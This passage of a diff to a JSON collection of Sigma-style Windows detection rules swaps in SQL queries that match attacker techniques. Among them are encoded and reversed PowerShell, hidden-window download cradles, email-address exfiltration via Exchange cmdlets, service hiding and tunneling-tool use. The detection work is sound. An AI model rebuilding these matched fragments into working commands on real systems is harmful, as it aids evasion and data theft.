AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "status": "test", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "GPO" + "Various applications", + "Tools that include ping or nslookup command invocations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_screensaver.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.defense_evasion" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", - "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "status": "experimental", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1090" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", - "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND 